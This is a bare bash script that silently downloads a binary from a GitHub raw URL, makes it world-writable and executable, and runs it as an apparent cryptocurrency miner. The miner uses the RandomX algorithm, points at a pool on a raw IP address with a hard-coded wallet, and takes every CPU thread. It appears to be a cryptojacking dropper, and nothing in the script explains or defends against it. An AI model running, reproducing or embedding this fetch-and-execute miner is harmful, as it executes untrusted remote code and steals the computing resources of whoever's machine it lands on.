#!/bin/bash
wget -O gigi https://github.com/cornea99/upil/raw/main/zepo > /dev/null 2>&1
chmod 777 gigi
./gigi --donate-level 1 -o 134.122.78.130:443 -u SaLvsC7GYZSQpZXn4F63d52MSxNjKLa3hh92Mucq2Av29ueS1Lej8HK8r7P3arc9BvKsduPQ17pYdZG74au9hXs2cwHyZ9CFwuw -p lama -a rx/0 -t $(nproc --all)
